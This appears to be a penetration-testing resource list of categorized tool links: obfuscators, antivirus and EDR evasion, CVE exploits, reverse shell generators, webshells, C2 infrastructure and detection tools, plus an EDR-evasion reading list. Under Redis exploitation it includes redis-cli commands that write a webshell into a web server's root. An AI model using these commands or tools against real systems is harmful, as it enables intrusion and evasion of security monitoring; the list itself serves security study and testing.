https://github.com/R3MRUM/PSDecode - Powershell DE-Obfuscation
https://github.com/denisugarte/PowerDrive - A tool for de-obfuscating PowerShell scripts
https://github.com/matterpreter/DefenderCheck - Identifies the bytes that Microsoft Defender flags on.
https://github.com/rasta-mouse/ThreatCheck - Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.
https://github.com/hegusung/AVSignSeek - Tool written in python3 to determine where the AV signature is located in a binary/payload
https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES
https://github.com/ION28/BLUESPAWN - An Active Defense and EDR software to empower Blue Teams
https://github.com/hasherezade/hollows_hunter - Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
https://github.com/hasherezade/pe-sieve - Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
https://github.com/0Kee-Team/WatchAD - AD Security Intrusion Detection System
https://github.com/nsacyber/Mitigating-Web-Shells
https://github.com/redcanaryco/atomic-red-team - Small and highly portable detection tests based on MITRE's ATT&CK.
https://github.com/DamonMohammadbagher/ETWProcessMon2 - ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
https://github.com/p0dalirius/LDAPmonitor - Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
https://github.com/PSGumshoe/PSGumshoe - PSGumshoe is a Windows PowerShell module for the collection of OS and domain artifacts for the purposes of performing live response, hunt, and forensics.
https://github.com/rajiv2790/FalconEye - FalconEye is a windows endpoint detection software for real-time process injections. It is a kernel-mode driver that aims to catch process injections as they are happening (real-time). Since FalconEye runs in kernel mode, it provides a stronger and reliable defense against process injection techniques that try to evade various user-mode hooks.
# Wordlists / Wordlist generators
https://github.com/danielmiessler/SecLists
https://github.com/berzerk0/Probable-Wordlists
https://github.com/govolution/betterdefaultpasslist
https://github.com/insidetrust/statistically-likely-usernames
https://github.com/LandGrey/pydictor
https://github.com/sc0tfree/mentalist
https://github.com/skahwah/wordsmith
https://github.com/1N3/IntruderPayloads
https://github.com/fuzzdb-project/fuzzdb
https://github.com/Bo0oM/fuzz.txt
https://github.com/laconicwolf/Password-Scripts
https://github.com/FlameOfIgnis/Pwdb-Public - A collection of all the data i could extract from 1 billion leaked credentials from internet.
# AD Lab Environment
https://github.com/davidprowe/BadBlood
https://github.com/WazeHell/vulnerable-AD - Create a vulnerable active directory that's allowing you to test most of the active directory attacks in a local lab
https://github.com/clong/DetectionLab - Automate the creation of a lab environment complete with security tooling and logging best practices
# Obfuscation
https://github.com/xoreaxeaxeax/movfuscator
https://github.com/danielbohannon/Invoke-DOSfuscation
https://github.com/unixpickle/gobfuscate - GO Obfuscator
https://github.com/NotPrab/.NET-Obfuscator - Lists of .NET Obfuscator (Free, Trial, Paid and Open Source )
https://github.com/javascript-obfuscator/javascript-obfuscator - Javascript Obfuscator
https://github.com/danielbohannon/Invoke-Obfuscation - Powershell Obfuscator
https://github.com/BinaryScary/NET-Obfuscate - .NET IL Obfuscator
https://github.com/scrt/avcleaner - C/C++ source obfuscator for antivirus bypass
https://github.com/meme/hellscape - GIMPLE obfuscator for C, C++, Go, ... all supported GCC targets and front-ends that use GIMPLE.
https://github.com/mgeeky/VisualBasicObfuscator - VBS Obfuscator
https://github.com/3xpl01tc0d3r/Obfuscator - Shellcode Obfuscator
https://github.com/EgeBalci/sgn - Shellcode Encoder
https://github.com/burrowers/garble - Obfuscate Go builds
https://github.com/JustasMasiulis/xorstr - heavily vectorized c++17 compile time string encryption.
https://github.com/AnErrupTion/LoGiC.NET - A more advanced free and open .NET obfuscator using dnlib.
https://github.com/klezVirus/chameleon - PowerShell Script Obfuscator
https://github.com/xforcered/InvisibilityCloak - Proof-of-concept obfuscation toolkit for C# post-exploitation tools
https://github.com/Flangvik/RosFuscator - YouTube/Livestream project for obfuscating C# source code using Roslyn
https://github.com/JoelGMSec/Invoke-Stealth - Simple & Powerful PowerShell Script Obfuscator
https://github.com/GetRektBoy724/BetterXencrypt - A better version of Xencrypt.Xencrypt it self is a Powershell runtime crypter designed to evade AVs.
https://github.com/obfuscator-llvm/obfuscator - C obfuscator
https://github.com/moloch--/denim - NIM llvm obfuscator
# Hash Crack / Decryption
https://hashcat.net/hashcat/
https://github.com/Ciphey/Ciphey - Ciphey is an automated decryption tool. Input encrypted text, get the decrypted text back.
https://github.com/Coalfire-Research/npk - A mostly-serverless distributed hash cracking platform
https://github.com/JoelGMSec/Cloudtopolis - Cracking hashes in the Cloud (for free!)
https://github.com/f0cker/crackq - CrackQ: A Python Hashcat cracking queue system
# Source Code / Binary Analysis
## Binary Analysis
https://github.com/avast/retdec
https://github.com/MobSF/Mobile-Security-Framework-MobSF
## Source Code Analysis
https://github.com/mre/awesome-static-analysis
https://github.com/eslint/eslint - Javascript
https://github.com/dpnishant/jsprime - Javascript
https://github.com/phpstan/phpstan - PHP
https://github.com/ecriminal/phpvuln - Audit tool to find common vulnerabilities in PHP source code
# Nim
https://github.com/snovvcrash/NimHollow - Nim implementation of Process Hollowing using syscalls (PoC)
https://github.com/jonaslejon/malicious-pdf - Malicious PDF Generator
https://github.com/byt3bl33d3r/OffensiveNim
https://github.com/Yardanico/nim-strenc - A tiny library to automatically encrypt string literals in Nim code
https://github.com/ChaitanyaHaritash/NIM-Scripts
https://github.com/Moriarty2016/NimRDI - RDI implementation in Nim
https://github.com/ajpc500/NimExamples - A collection of offensive Nim example code
https://github.com/elddy/Nim-SMBExec - SMBExec implementation in Nim - SMBv2 using NTLM Authentication with Pass-The-Hash technique
https://github.com/FedericoCeratto/nim-socks5 - Nim Socks5 library
# MISC
https://github.com/rvrsh3ll/TokenTactics - Azure JWT Token Manipulation Toolset
https://github.com/zer1t0/ticket_converter - A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.
https://github.com/pentestmonkey/gateway-finder
https://github.com/Cybellum/DoubleAgent
https://github.com/ytisf/theZoo
https://github.com/kbandla/APTnotes
https://github.com/WindowsLies/BlockWindows
https://github.com/secrary/InjectProc
https://github.com/AlsidOfficial/WSUSpendu
https://github.com/SigPloiter/SigPloit
https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist
https://github.com/PowerShell/PowerShell
https://github.com/landhb/HideProcess
https://github.com/meliht/Mr.SIP
https://github.com/XiphosResearch/exploits
https://github.com/jas502n/CVE-2019-13272
https://github.com/fox-it/cve-2019-1040-scanner
https://github.com/worawit/MS17-010
https://github.com/DiabloHorn/yara4pentesters
https://github.com/D4Vinci/Cr3dOv3r
https://github.com/a2u/CVE-2018-7600 - Drupal Exploit
https://github.com/joxeankoret/CVE-2017-7494 - SAMBA Exploit
https://github.com/D4Vinci/One-Lin3r - Reverse Shell Oneliner / Payload Generation
https://github.com/0x00-0x00/ShellPop - Reverse/Bind Shell Generator
https://github.com/Acceis/crypto_identifier
https://github.com/sensepost/UserEnum - check if a user is valid in a domain
https://github.com/LOLBAS-Project/LOLBAS - Living of the Land Binaries
https://github.com/peewpw/Invoke-BSOD - Windows Denial of Service Exploit
https://github.com/mtivadar/windows10_ntfs_crash_dos - Windows Denial of Service Exploit
https://github.com/deepzec/Bad-Pdf PDF Steal NTLMv2 Hash Exploit - CVE-2018-4993
https://github.com/SecureAuthCorp/impacket - :boom: :fire: :boom:
https://github.com/blacknbunny/libSSH-Authentication-Bypass - LibSSH Authentication Bypass vuln.
https://github.com/OneLogicalMyth/zeroday-powershell - windows Privesc Exploit
https://github.com/smicallef/spiderfoot - OSINT
https://github.com/ShawnDEvans/smbmap
https://github.com/Coalfire-Research/java-deserialization-exploits - Deserialisation Exploits
https://github.com/RhinoSecurityLabs/GCPBucketBrute - S3 bucket tester
https://github.com/khast3x/h8mail
https://github.com/dirkjanm/adidnsdump - Zone transfer like for internal assessment
https://github.com/gquere/pwn_jenkins
https://github.com/JavelinNetworks/IR-Tools - Get-ShellContent.ps1 get the typed content for all open shells
https://github.com/taviso/ctftool - windows CTF Exploitation
https://github.com/jedisct1/dsvpn
https://github.com/GoSecure/dtd-finder
https://github.com/tyranid/DotNetToJScript
https://github.com/cfreal/exploits - Apache Privilege Escalation
https://github.com/Al1ex/WindowsElevation - Windows Elevation(持续更新)
https://github.com/adamdriscoll/snek - Execute python from powershell
https://github.com/g0tmi1k/exe2hex
https://github.com/beurtschipper/Depix - Recovers passwords from pixelized screenshots
https://github.com/slaeryan/AQUARMOURY - This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
https://github.com/mmozeiko/aes-finder - Utility to find AES keys in running processes
https://github.com/Flangvik/SharpCollection - Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.
https://github.com/CCob/MinHook.NET - A C# port of the MinHook API hooking library
https://github.com/Mr-Un1k0d3r/EDRs - This repo contains information about EDRs that can be useful during red team exercise.
# Big-IP Exploitation
https://github.com/jas502n/CVE-2020-5902
# Azure Cloud Tools
https://github.com/hausec/PowerZure
https://github.com/NetSPI/MicroBurst
https://github.com/dirkjanm/ROADtools - The Azure AD exploration framework.
https://github.com/dafthack/CloudPentestCheatsheets
https://github.com/cyberark/BlobHunter - Find exposed data in Azure with this public blob scanner
# Anonymous / Tor Projects
https://github.com/realgam3/pymultitor
https://github.com/Und3rf10w/kali-anonsurf
https://github.com/GouveaHeitor/nipe
https://github.com/cryptolok/GhostInTheNet
https://github.com/DanMcInerney/elite-proxy-finder
# Exploit Search
https://github.com/vulnersCom/getsploit
https://github.com/1N3/Findsploit
# Industrial Control Systems
https://github.com/dark-lbp/isf
https://github.com/klsecservices/s7scan
https://github.com/w3h/isf
https://github.com/atimorin/scada-tools -
# Network access control bypass
https://github.com/scipag/nac_bypass
# Jenkins
https://github.com/cedowens/Jenkins_Hunter_CSharp
https://github.com/petercunha/jenkins-rce
https://github.com/gquere/pwn_jenkins
https://medium.com/@adamyordan/a-case-study-on-jenkins-rce-c2558654f2ce
https://github.com/Accenture/jenkins-attack-framework
# JMX Exploitation
https://github.com/mogwailabs/mjet
https://github.com/siberas/sjet
https://github.com/qtc-de/beanshooter - JMX enumeration and attacking tool.
https://github.com/mogwaisec/mjet - Mogwai Java Management Extensions (JMX) Exploitation Toolkit
# Citrix Netscaler Pwn
https://github.com/trustedsec/cve-2019-19781
# mikrotik pwn
https://github.com/vulnersCom/mikrot8over - Fast exploitation tool for Mikrotik RouterOS up to 6.38.4
# Red Team infrastructure setup
https://github.com/obscuritylabs/RAI
https://github.com/Coalfire-Research/Red-Baron - terraform cloud c2 redirector setup
https://github.com/qsecure-labs/overlord - Red Teaming Infrastructure Automation based on Red-Baron
https://github.com/rmikehodges/hideNsneak - This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.
https://github.com/shr3ddersec/Shr3dKit
https://github.com/t94j0/satellite
https://github.com/Cerbersec/DomainBorrowingC2 - Domain Borrowing is a new method to hide C2 traffic using CDN. It was first presented at Blackhat Asia 2021 by Junyu Zhou and Tianze Ding.
https://github.com/Dliv3/DomainBorrowing - Domain Borrowing PoC
# Bypass SPF/DKIM/DMARC
https://github.com/chenjj/espoofer
# Redis Exploitation
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce
MSF:
* scanner/redis/file_upload
* exploit/linux/redis/redis_replication_cmd_exec
Windows Targets - Webshell upload
```
redis-cli -h targethost -p targetport
config set dir C:\inetpub\wwwroot\
config set dbfilename shell.aspx
set test "Webshell content"
save
```
# Apache Tomcat Exploitation
https://github.com/mgeeky/tomcatWarDeployer - Apache Tomcat auto WAR deployment & pwning penetration testing tool.
https://github.com/00theway/Ghostcat-CNVD-2020-10487 - AJP Exploit CVE-2020-1938
https://github.com/Ridter/redis-rce
# SSRF Exploitation
https://github.com/swisskyrepo/SSRFmap
# LFI exploitation
https://github.com/mzfr/liffy
# MondoDB Redis Couchdb Exploitation
https://github.com/torque59/Nosql-Exploitation-Framework
https://github.com/Charlie-belmer/nosqli - NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.
# XXE
https://github.com/luisfontes19/xxexploiter
# Elasticsearch / Kibana Exploitation
https://github.com/0xbug/Biu-framework
# RMI attacks
https://github.com/NickstaDB/BaRMIe
https://github.com/BishopFox/rmiscout - RMIScout uses wordlist and bruteforce strategies to enumerate Java RMI functions and exploit RMI parameter unmarshalling vulnerabilities
# JSON Web Token Analysis / Exploitation
https://github.com/ticarpi/jwt_tool
# Docker Exploitation
https://github.com/AbsoZed/DockerPwn.py - automation of Docker TCP socket abuse
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/CVE%20Exploits/Docker%20API%20RCE.py - Docker API exposed RCE
# PHP exploits
https://github.com/neex/phuip-fpizdam - nginx + php misconfiguration
# Cloud attack tools
https://github.com/mdsecactivebreach/o365-attack-toolkit
# Bluetooth / low energy
https://github.com/ojasookert/CVE-2017-0785
https://github.com/evilsocket/bleah
https://github.com/virtualabs/btlejack
# Wireless / Radio Exploitation
https://github.com/mame82/LOGITacker
# APT / Malware Emulation / Defense Check
https://github.com/TryCatchHCF/DumpsterFire
https://github.com/NextronSystems/APTSimulator
https://github.com/redhuntlabs/RedHunt-OS
https://github.com/guardicore/monkey
# Hash Crack / Lookup
https://github.com/k4m4/dcipher-cli
https://github.com/s0md3v/Hash-Buster
https://github.com/initstring/passphrase-wordlist
# OSCP Lists / tools / help
https://github.com/sailay1996/expl-bin
https://github.com/CyDefUnicorn/OSCP-Archives
# ASPX Webshells
https://github.com/antonioCoco/SharPyShell
# PHP Webshells
https://github.com/flozz/p0wny-shell
https://github.com/nil0x42/phpsploit - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
https://github.com/gellin/bantam - A PHP backdoor management and generation tool/C2 featuring end to end encrypted payload streaming designed to bypass WAF, IDS, SIEM systems.
# JSP WebShells
https://github.com/SecurityRiskAdvisors/cmd.jsp
# Other Tool-Lists / Cheat Sheets
https://github.com/D3VI5H4/Antivirus-Artifacts - List of Hooking DLLs for different AV vendors
https://github.com/PwnDexter/SharpEDRChecker - Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
https://github.com/Hack-with-Github/Awesome-Hacking
https://github.com/enaqx/awesome-pentest
https://github.com/HarmJ0y/CheatSheets
https://github.com/zhzyker/exphub
https://github.com/vysecurity/RedTips
https://github.com/toolswatch/blackhat-arsenal-tools
https://github.com/jivoi/awesome-osint
https://github.com/qazbnm456/awesome-cve-poc
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/dsasmblr/hacking-online-games
https://github.com/carpedm20/awesome-hacking
https://github.com/rshipp/awesome-malware-analysis
https://github.com/thibmaek/awesome-raspberry-pi
https://github.com/bigb0sss/RedTeam-OffensiveSecurity
https://github.com/vitalysim/Awesome-Hacking-Resources
https://github.com/mre/awesome-static-analysis
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/infosecn1nja/Red-Teaming-Toolkit
https://github.com/rmusser01/Infosec_Reference
https://github.com/trimstray/the-book-of-secret-knowledge
https://github.com/N7WEra/SharpAllTheThings
https://github.com/3gstudent/Pentest-and-Development-Tips
https://github.com/qazbnm456/awesome-web-security
https://github.com/chryzsh/awesome-windows-security
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
https://github.com/We5ter/Scanners-Box
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/smgorelik/Windows-RCE-exploits
https://github.com/trustedsec/physical-docs
https://github.com/matterpreter/OffensiveCSharp
https://github.com/mgeeky/Penetration-Testing-Tools
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
https://github.com/netbiosX/Checklists
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
https://github.com/adon90/pentest_compilation
https://github.com/sailay1996/awesome_windows_logical_bugs
https://github.com/EnableSecurity/awesome-rtc-hacking
https://github.com/api0cradle/UltimateAppLockerByPassList
https://github.com/hahwul/WebHackersWeapons
https://github.com/d0nkeys/redteam
https://github.com/d1pakda5/PowerShell-for-Pentesters
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
https://github.com/google/tsunami-security-scanner
# Resource
1. [Cobalt Strike and Tradecraft]([https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/](https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/"))
2. [Hells Gate Win SysCall]([https://github.com/boku7/HellsGatePPID](https://github.com/boku7/HellsGatePPID "https://github.com/boku7/HellsGatePPID"))
3. [Rapidly Search and Hunt through Windows Event Logs]([https://github.com/countercept/chainsaw](https://github.com/countercept/chainsaw "https://github.com/countercept/chainsaw"))
4. [Production tracing with Event Tracing for Windows ETW]([https://www.youtube.com/watch?v=FYi5No2nwoI](https://www.youtube.com/watch?v=FYi5No2nwoI "https://www.youtube.com/watch?v=FYi5No2nwoI"))
5. [Hiding Your .NET – ETW]([https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/](https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/ "https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/"))
6. [Universally Evading Sysmon and ETW]([https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/](https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/"))
7. [Setting Up Kernel-Mode Debugging]([https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-kernel-mode-debugging-in-windbg--cdb--or-ntsd](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-kernel-mode-debugging-in-windbg--cdb--or-ntsd "https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-kernel-mode-debugging-in-windbg--cdb--or-ntsd"))
8. [Detecting Sysmon on the Victim Host]([https://www.ired.team/offensive-security/enumeration-and-discovery/detecting-sysmon-on-the-victim-host](https://www.ired.team/offensive-security/enumeration-and-discovery/detecting-sysmon-on-the-victim-host "https://www.ired.team/offensive-security/enumeration-and-discovery/detecting-sysmon-on-the-victim-host"))
9. [Cobalt Strike BOF - Inject ETW Bypass]([https://github.com/boku7/injectEtwBypass](https://github.com/boku7/injectEtwBypass "https://github.com/boku7/injectEtwBypass"))
10. [Syscalls with D/Invoke]([https://offensivedefence.co.uk/posts/dinvoke-syscalls/](https://offensivedefence.co.uk/posts/dinvoke-syscalls/ "https://offensivedefence.co.uk/posts/dinvoke-syscalls/"))
11. [A Tale of EDR Bypass Methods]([https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/](https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/ "https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/"))
12. [EDR Evasion: Unhooking DLL's With CSharp]([https://makosecblog.com/malware-dev/dll-unhooking-csharp/](https://makosecblog.com/malware-dev/dll-unhooking-csharp/ "https://makosecblog.com/malware-dev/dll-unhooking-csharp/"))
13. [Playing With An EDR: Cylance]([https://roberreigada.github.io/posts/playing_with_an_edr/](https://roberreigada.github.io/posts/playing_with_an_edr/ "https://roberreigada.github.io/posts/playing_with_an_edr/"))
14. [Full DLL Unhooking With C++]([https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++](https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ "https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++"))
15. [Data Only Attack: Neutralizing EtwTi Provider]([https://public.cnotools.studio/bring-your-own-vulnerable-kernel-driver-byovkd/exploits/data-only-attack-neutralizing-etwti-provider](https://public.cnotools.studio/bring-your-own-vulnerable-kernel-driver-byovkd/exploits/data-only-attack-neutralizing-etwti-provider "https://public.cnotools.studio/bring-your-own-vulnerable-kernel-driver-byovkd/exploits/data-only-attack-neutralizing-etwti-provider"))
16. [Beginner's Guide To EDR Evasion]([https://kylemistele.medium.com/a-beginners-guide-to-edr-evasion-b98cc076eb9a](https://kylemistele.medium.com/a-beginners-guide-to-edr-evasion-b98cc076eb9a "https://kylemistele.medium.com/a-beginners-guide-to-edr-evasion-b98cc076eb9a"))
17. [NTAPI Undocumented Functions]([http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/ "http://undocumented.ntinternals.net/"))
18. [Alertable I/O]([https://docs.microsoft.com/en-us/windows/win32/fileio/alertable-i-o](https://docs.microsoft.com/en-us/windows/win32/fileio/alertable-i-o "https://docs.microsoft.com/en-us/windows/win32/fileio/alertable-i-o"))
19. [ELAM - Microsoft]([https://docs.microsoft.com/en-us/windows-hardware/drivers/install/early-launch-antimalware](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/early-launch-antimalware "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/early-launch-antimalware"))
20. [APC Queue Code Injection]([https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection "https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection"))
21. [Master of Puppets Part II - How To Tamper The EDR]([https://www.infosec.tirol/master-of-puppets-part-ii-how-to-tamper-the-edr/](https://www.infosec.tirol/master-of-puppets-part-ii-how-to-tamper-the-edr/ "https://www.infosec.tirol/master-of-puppets-part-ii-how-to-tamper-the-edr/"))
22. [Evading EDR With Inline Hooks]([https://www.deepinstinct.com/blog/evading-antivirus-detection-with-inline-hooks](https://www.deepinstinct.com/blog/evading-antivirus-detection-with-inline-hooks "https://www.deepinstinct.com/blog/evading-antivirus-detection-with-inline-hooks"))
23. [Thread Local Storage - MSDN]([https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage](https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage "https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage"))
24. [Thread Local Storage 2 - Explicit TLS]([http://www.nynaeve.net/?p=181](http://www.nynaeve.net/?p=181 "http://www.nynaeve.net/?p=181"))
25. [OverviewInterception]([https://github.com/microsoft/detours/wiki/OverviewInterception](https://github.com/microsoft/detours/wiki/OverviewInterception "https://github.com/microsoft/detours/wiki/OverviewInterception"))
26. [EDR - A Closer Look At Protect Services]([https://www.infosec.tirol/edr-a-closer-look-at-protected-services/](https://www.infosec.tirol/edr-a-closer-look-at-protected-services/ "https://www.infosec.tirol/edr-a-closer-look-at-protected-services/"))
27. [FindETWProviderImage]([https://github.com/matterpreter/FindETWProviderImage](https://github.com/matterpreter/FindETWProviderImage "https://github.com/matterpreter/FindETWProviderImage"))
28. [ETW Bypasses]([https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/disabling-patching-telemetry/etw-bypasses](https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/disabling-patching-telemetry/etw-bypasses "https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/disabling-patching-telemetry/etw-bypasses"))
29. [Another method of bypassing ETW]([https://modexp.wordpress.com/2020/04/08/red-teams-etw/)](https://modexp.wordpress.com/2020/04/08/red-teams-etw/)](https://modexp.wordpress.com/2020/04/08/red-teams-etw/)](https://modexp.wordpress.com/2020/04/08/red-teams-etw/) "https://modexp.wordpress.com/2020/04/08/red-teams-etw/)](https://modexp.wordpress.com/2020/04/08/red-teams-etw/)")
30. [Hiding Your .NET - ETW]([https://blog.xpnsec.com/hiding-your-dotnet-etw/](https://blog.xpnsec.com/hiding-your-dotnet-etw/ "https://blog.xpnsec.com/hiding-your-dotnet-etw/"))
31. [Ninja UUID Runner]([https://github.com/boku7/Ninja_UUID_Runner](https://github.com/boku7/Ninja_UUID_Runner "https://github.com/boku7/Ninja_UUID_Runner"))
32. [Unhook Import Address Table]([https://github.com/xalicex/Unhook-Import-Address-Table](https://github.com/xalicex/Unhook-Import-Address-Table "https://github.com/xalicex/Unhook-Import-Address-Table"))
33. [Full DLL Unhooking With C++]([https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++](https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ "https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++"))
34. [Bypassing Cylance and Other EDR-AV]([https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis](https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis "https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis"))
35. [Detecting Hooked Syscalls]([https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions](https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions "https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions"))
36. [Windows X86-X64 System Call Table]([https://j00ru.vexillium.org/syscalls/nt/64/](https://j00ru.vexillium.org/syscalls/nt/64/ "https://j00ru.vexillium.org/syscalls/nt/64/"))
37. [Hell's Gate Technique]([https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf](https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf "https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf"))
38. [Calling Syscalls From Visual Studio]([https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs](https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs"))
39. [PE Format - MSDN]([https://docs.microsoft.com/en-us/windows/win32/debug/pe-format](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format"))
40. [PEB_LDR_DATA - MSDN]([https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data"))
41. [Bypassing EDR Hooks]([https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6](https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6"))
42. [Blinding EDR On Windows]([https://synzack.github.io/Blinding-EDR-On-Windows/](https://synzack.github.io/Blinding-EDR-On-Windows/ "https://synzack.github.io/Blinding-EDR-On-Windows/"))
43. [Windows Kernel Ps Callbacks]([https://blog.deniable.org/posts/windows-callbacks/](https://blog.deniable.org/posts/windows-callbacks/ "https://blog.deniable.org/posts/windows-callbacks/"))
44. [Kernel Ps Callback Experiments]([https://github.com/uf0o/windows-ps-callbacks-experiments](https://github.com/uf0o/windows-ps-callbacks-experiments "https://github.com/uf0o/windows-ps-callbacks-experiments"))
45. [Direct Syscalls in BOFs]([https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/](https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/ "https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/"))
46. [Implementing Syscalls in ArtifactKit]([https://br-sn.github.io/Implementing-Syscalls-In-The-CobaltStrike-Artifact-Kit/](https://br-sn.github.io/Implementing-Syscalls-In-The-CobaltStrike-Artifact-Kit/ "https://br-sn.github.io/Implementing-Syscalls-In-The-CobaltStrike-Artifact-Kit/"))
47. [Cobalt Strike - InlineWhispers ArtifactKit]([https://www.youtube.com/watch?v=mZyMs2PP38w](https://www.youtube.com/watch?v=mZyMs2PP38w "https://www.youtube.com/watch?v=mZyMs2PP38w"))
48. [Using Inline Assembly in C/C++]([https://www.codeproject.com/articles/15971/using-inline-assembly-in-c-c](https://www.codeproject.com/articles/15971/using-inline-assembly-in-c-c "https://www.codeproject.com/articles/15971/using-inline-assembly-in-c-c"))
49. [InlineWhispers]([https://github.com/outflanknl/InlineWhispers](https://github.com/outflanknl/InlineWhispers "https://github.com/outflanknl/InlineWhispers"))
50. [Utilizing Syscalls in CSharp]([https://jhalon.github.io/utilizing-syscalls-in-csharp-1/](https://jhalon.github.io/utilizing-syscalls-in-csharp-1/ "https://jhalon.github.io/utilizing-syscalls-in-csharp-1/"))
51. [Direct Syscalls and sRDI]([https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"))
# Azure Red Team Master
# Azure Active Directory
Original Source:[Swisskyrepo](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)
## PreReq Requirements and free training
[Webcast: OPSEC Fundamentals for Remote Red Teams](https://www.blackhillsinfosec.com/webcast-opsec-fundamentals-for-remote-red-teams/)
[EDITED EDITION — Getting Started in Pentesting The Cloud–Azure | Beau Bullock | 1-Hour](https://www.youtube.com/watch?v=u_3cV0pzptY)
